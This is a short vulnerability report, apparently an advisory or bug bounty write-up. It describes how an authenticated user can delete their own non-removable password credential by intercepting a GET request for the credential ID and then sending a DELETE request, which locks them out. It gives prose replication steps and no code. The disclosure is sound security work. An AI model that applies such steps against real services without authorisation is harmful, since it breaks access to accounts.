Authenticated users are able to delete their passwords via a DELETE request to a user's credential ID endpoint. This is despite the user's password being marked as non-removable by a boolean. Upon this DELETE request being processed, a user will have their password deleted, preventing this user from logging in.

== Replication Steps

1. A user must obtain their credentials ID via intercepting a GET request made to the credential endpoint. The password credential is located under userCredentialMetadatas as id. See
2. A DELETE request can then be sent to the credentials ID endpoint. This request will remove the password from the user account.
3. A subsequent request to the credential endpoint will verify that the password credential no longer exists.